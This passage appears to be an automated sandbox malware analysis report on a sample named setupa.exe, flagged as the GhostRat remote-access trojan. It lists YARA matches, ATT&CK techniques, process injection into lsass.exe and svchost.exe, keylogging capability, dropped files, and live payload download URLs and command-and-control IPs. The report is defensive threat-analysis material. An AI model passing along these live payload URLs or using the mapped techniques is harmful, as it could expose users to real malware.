                      Source: Yara matchFile source: 0000000C.00000003.2318618858.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292327565.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246797998.000000000286D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043504278.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3346097174.0000000004852000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318479368.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043302904.0000000002870000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246719024.000000000286D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318739703.0000000004984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318479368.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3349931132.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3348722522.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292327565.0000000002870000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246842041.0000000004552000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2318739703.0000000004912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2338206272.0000000004852000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3354222266.0000000006733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292521835.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3347172652.0000000004984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.3349260884.0000000005130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2235102743.0000000004452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3292583935.0000000004512000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2246842041.0000000004584000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000003.2308042453.0000000002C32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.3043573393.0000000004512000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5740, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3636, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF689641E97 Concurrency::details::WorkItem::BindTo,0_2_00007FF689641E97
                      Source: C:\Users\user\Desktop\setupa.exeCode function: 0_2_00007FF6896410D2 Concurrency::details::SchedulerBase::ListenAffinity,0_2_00007FF6896410D2

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Replication Through Removable Media                      		2
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Exploitation for Privilege Escalation                      		1
                      Disable or Modify Tools                      		121
                      Input Capture                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts3
                      Command and Scripting Interpreter                      		1
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory11
                      Peripheral Device Discovery                      		Remote Desktop Protocol1
                      Screen Capture                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Access Token Manipulation                      		2
                      Obfuscated Files or Information                      		Security Account Manager1
                      Account Discovery                      		SMB/Windows Admin Shares121
                      Input Capture                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook622
                      Process Injection                      		1
                      Install Root Certificate                      		NTDS3
                      File and Directory Discovery                      		Distributed Component Object Model2
                      Clipboard Data                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		LSA Secrets37
                      System Information Discovery                      		SSHKeylogging3
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      File Deletion                      		Cached Domain Credentials151
                      Security Software Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items123
                      Masquerading                      		DCSync141
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Modify Registry                      		Proc Filesystem3
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Access Token Manipulation                      		Network Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd622
                      Process Injection                      		Input Capture1
                      System Network Configuration Discovery                      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                      Indicator Removal                      		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527612 Sample: setupa.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 47 kehu8.oss-cn-hongkong.aliyuncs.com 2->47 49 fp2e7a.wpc.phicdn.net 2->49 51 fp2e7a.wpc.2be4.phicdn.net 2->51 59 Suricata IDS alerts for network traffic 2->59 61 Multi AV Scanner detection for submitted file 2->61 63 Yara detected GhostRat 2->63 65 4 other signatures 2->65 9 setupa.exe 4 2->9         started        signatures3 process4 dnsIp5 53 kehu8.oss-cn-hongkong.aliyuncs.com 47.79.64.157, 443, 49704, 49705 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 9->53 43 C:\Program Files\upupoo-classicshell.exe, PE32 9->43 dropped 45 C:\Program Files\ClassicStartMenuDLL.dll, PE32 9->45 dropped 75 Contain functionality to detect virtual machines 9->75 77 Writes to foreign memory regions 9->77 79 Allocates memory in foreign processes 9->79 81 Injects a PE file into a foreign processes 9->81 14 lsass.exe 16 9->14 injected 17 upupoo-classicshell.exe 1 9->17         started        file6 signatures7 process8 file9 83 Installs new ROOT certificates 14->83 85 Creates files in the system32 config directory 14->85 87 Writes to foreign memory regions 14->87 20 upupoo-classicshell.exe 14->20         started        23 svchost.exe 14->23 injected 25 svchost.exe 11 1 14->25         started        27 dllhost.exe 14->27         started        39 C:\Users\...\upupoo-classicshell.exe (copy), PE32 17->39 dropped 41 C:\Users\...\ClassicStartMenuDLL.dll (copy), PE32 17->41 dropped 89 Allocates memory in foreign processes 17->89 29 svchost.exe 3 17->29         started        32 WerFault.exe 16 17->32         started        signatures10 process11 dnsIp12 67 Writes to foreign memory regions 20->67 69 Allocates memory in foreign processes 20->69 34 svchost.exe 20->34         started        37 WerFault.exe 21 20->37         started        55 47.239.116.158, 49707, 49709, 49728 CHARTER-20115US United States 29->55 71 Contains functionality to inject threads in other processes 29->71 73 Contains functionality to capture and log keystrokes 29->73 signatures13 process14 signatures15 57 System process connects to network (likely due to code injection or exploit) 34->57

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      setupa.exe11%VirustotalBrowse

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Program Files\upupoo-classicshell.exe0%ReversingLabs
                      C:\Users\Public\Documents\upupoo-classicshell.exe (copy)0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/erties0%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2004/09/policy1p0%VirustotalBrowse
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                      http://upx.sf.net0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust/Issue0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/02/sc0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%URL Reputationsafe
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd0%URL Reputationsafe
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA0%VirustotalBrowse
                      https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf0%VirustotalBrowse
                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srf0%VirustotalBrowse
                      https://login.microsoftonline.com/ppsecure/ResolveUser.srf0%VirustotalBrowse
                      http://Passport.NET/tbA0%VirustotalBrowse
                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utili0728275966HRDQJD0%VirustotalBrowse
                      https://login.microsoftonline.com/MSARST2.srf0%VirustotalBrowse
                      http://docs.oasis-open.org/wss/20%VirustotalBrowse
                      http://Passport.NET/STS0%VirustotalBrowse
                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-0%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2005/07/securitypolicy0%VirustotalBrowse
                      https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%0%VirustotalBrowse
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds0%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2005/02/scdom0%VirustotalBrowse
                      https://login.microsoftonline.com/ppsecure/devicechangecredential.srf0%VirustotalBrowse
                      https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.0%VirustotalBrowse
                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd0%VirustotalBrowse
                      https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf0%VirustotalBrowse
                      https://account.live.com/InlineSignup.aspx?iww=1&id=805020%VirustotalBrowse
                      http://docs.oasis-open.org/ws-sx/ws-trust/2005120%VirustotalBrowse
                      http://Passport.NET/tb_0%VirustotalBrowse
                      http://Passport.NET/tb0%VirustotalBrowse
                      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806030%VirustotalBrowse
                      https://signup.live.com/signup.aspx0%VirustotalBrowse
                      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806010%VirustotalBrowse
                      https://login.live0%VirustotalBrowse
                      http://docs.oasis-open.org/ws-sx/ws-securitypolicy/2007020%VirustotalBrowse
                      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806000%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      kehu8.oss-cn-hongkong.aliyuncs.com
                      		47.79.64.157
                      		truefalse
                        		unknown
                        fp2e7a.wpc.phicdn.net
                        		192.229.221.95
                        		truefalseunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://kehu8.oss-cn-hongkong.aliyuncs.com/upup.oxfalse
                          		unknown
                          https://kehu8.oss-cn-hongkong.aliyuncs.com/upupoo-classicshell.exefalse
                            		unknown
                            https://kehu8.oss-cn-hongkong.aliyuncs.com/ClassicStartMenuDLL.dllfalse
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://schemas.xmlsoap.org/ws/2004/09/policy1psvchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000001.00000002.3346055749.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              http://schemas.xmlsoap.org/ws/2004/09/policy=80600svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://kehu8.oss-cn-hongkong.aliyuncs.com/upup.oxTsetupa.exe, 00000000.00000002.2202299611.000001F5DCB43000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000008.00000003.2271420888.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://kehu8.oss-cn-hongkong.aliyuncs.com/upup.oxMsetupa.exe, 00000000.00000003.2137313739.000001F5DCDAD000.00000004.00000020.00020000.00000000.sdmp, setupa.exe, 00000000.00000003.2158570611.000001F5DCDAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdfosvchost.exe, 00000008.00000003.2331530275.000002D754574000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000001.00000002.3346055749.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      http://Passport.NET/tbAsvchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utili0728275966HRDQJDsvchost.exe, 00000008.00000002.3350658881.000002D754579000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      http://Passport.NET/STSsvchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350136674.000002D754513000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2316259625.000002D75457F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      http://docs.oasis-open.org/wss/2svchost.exe, 00000008.00000003.2316259625.000002D754574000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000001.00000002.3346055749.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000002.3346551021.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090512715.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                      https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      http://schemas.xmlsoap.org/ws/2005/02/scdomsvchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://3csp.icrosof4m/ocp0lsass.exe, 00000001.00000002.3350014220.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2091276716.00000140AE074000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdssvchost.exe, 00000008.00000003.2342560646.000002D754574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2362504881.000002D75457A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        http://Passport.NET/tbsvchost.exe, 00000008.00000002.3346593256.000002D753E7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350920486.000002D75457F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000001.00000002.3346551021.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090512715.00000140AD850000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2252612816.000002D75450E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2272320979.000002D754510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2252517534.000002D75450E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3349971930.000002D754500000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000008.00000003.2199678788.000002D754563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000008.00000003.2286058883.000002D754574000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://signup.live.com/signup.aspxsvchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D75452C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199591191.000002D75454D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        http://Passport.NET/tb_svchost.exe, 00000008.00000002.3351923495.000002D754C49000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://login.livesvchost.exe, 00000008.00000002.3346593256.000002D753E5E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdfosvchost.exe, 00000008.00000003.2331457254.000002D75456E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://kehu8.oss-cn-hongkong.aliyuncs.com/setupa.exe, 00000000.00000003.2117823175.000001F5DCC0C000.00000004.00000020.00020000.00000000.sdmp, setupa.exe, 00000000.00000003.2158472042.000001F5DCC0C000.00000004.00000020.00020000.00000000.sdmp, setupa.exe, 00000000.00000003.2137176745.000001F5DCC0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000001.00000002.3346055749.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                            http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000001.00000002.3346055749.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000001.00000000.2090485872.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3350490137.000002D75455F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://kehu8.oss-cn-hongkong.aliyuncs.com/#setupa.exe, 00000000.00000003.2137313739.000001F5DCD7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000008.00000002.3350283658.000002D754537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJsvchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199856552.000002D754556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://account.live.com/msangcwamsvchost.exe, 00000008.00000003.2199659414.000002D754540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199441553.000002D754552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199332280.000002D754529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199640134.000002D754557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2199612815.000002D75453B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.w3.orsvchost.exe, 00000008.00000003.2316259625.000002D754574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000008.00000002.3346451311.000002D753E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
